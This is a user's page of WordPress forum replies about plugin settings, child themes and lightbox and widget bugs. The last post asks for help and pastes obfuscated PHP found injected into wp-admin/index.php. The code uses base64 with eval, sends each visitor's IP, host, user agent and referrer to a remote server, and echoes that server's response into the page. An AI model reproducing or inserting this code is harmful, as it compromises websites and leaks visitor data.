CarolineElisa
Forum Replies Created
-
Thanks Tom!
The manual backup is now working. Will wait and see if the auto backup goes through tonight…
Forum: Plugins
In reply to: [Gallery to Slideshow] [Plugin: Gallery to Slideshow] add class to slide linkHi Stacybird,
Any chance you could share your solution for adding previous/next arrows?
Thanks!
Forum: Plugins
In reply to: [WP Stripe] [Plugin: WP Stripe] Official WP-Stripe UpdateThis will be great, thank you!
Hi Matt!
Now I’m getting:
I have my own gallery-to-slideshow.css file in my child theme folder, and in a ‘css’ subfolder.
Thanks,
CarolineHi Matt,
I’m afraid that
[gallery link=""/]
doesn’t remove the link for me. I also tried[gallery link=""]
.Thanks,
Caroline ElisaThanks Matt! But when I copy the .css file into my child theme, the stylesheet link becomes:
Instead of:
Shouldn’t
<?php echo get_stylesheet_directory_uri(); ?>
pick up the right location?Forum: Plugins
In reply to: [Lightbox Plus Colorbox] [Plugin: Lightbox Plus] Loading new page in LightboxMy bad! I wasn’t using the secondary lightbox feature properly!
Thanks anyway.
Forum: Plugins
In reply to: [Lightbox Plus Colorbox] [Plugin: Lightbox Plus] Loading new page in LightboxHi again,
To elaborate on what I said above…
Using other Lightbox plugins, I am able to get this to work when I choose the ‘type’ as ‘iframe’, rather than say ajax.
Thanks again.
CarolineForum: Plugins
In reply to: [LightPress Lightbox] [Plugin: WP jQuery Lightbox] How to size HTML popup?My bad, wrong plugin!
FYI I went with Lightbox Plus in the end because it worked ‘out of the box’.
Cheers.
Forum: Themes and Templates
In reply to: Responsive frameworks and child themes – guidance neededHi Sorcol,
If it is not too late (!), I would recommend using a child theme. This is because your parent theme (should) work across browsers and be bug-free. That way, when you make changes that screw up the theme you can always revert. Also, you can update the parent theme without losing your changes.
As for your first question…
I came across your post while searching for feedback on the Thematic 320 and Up theme. Did you end up going with that?
Cheers,
Caroline ElisaI get the same error. I am using WP 3.3.
Please please please let us know as soon as your fantastic plugin is compatible with 3.3.
Thanks!
Thanks for the rapid response!
– Firefox 8 for Mac
– WP 3.2.1
– I have 3 WYSIWYG widgets, with just 1 openTo clarify, it happens when I add a second link in a widget. The first time is fine.
Hi Danny, thanks for updating the plugin!
I can confirm that it is almost working for me.
The only problem I have come across is that when I add a link and select ‘open in a new window/tab’ then hit ‘Add link’, the page refreshes and I lose my widget content.
Forum: Fixing WordPress
In reply to: file_get_contents error – Urgent, please help!Ok, so the original error is back!
Line 55 in my index.php file under /wp-admin is:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
Same code repeated on line 58 and 59…
Where has this come from? Should this even be there?!
Hoping someone can help. Thanks!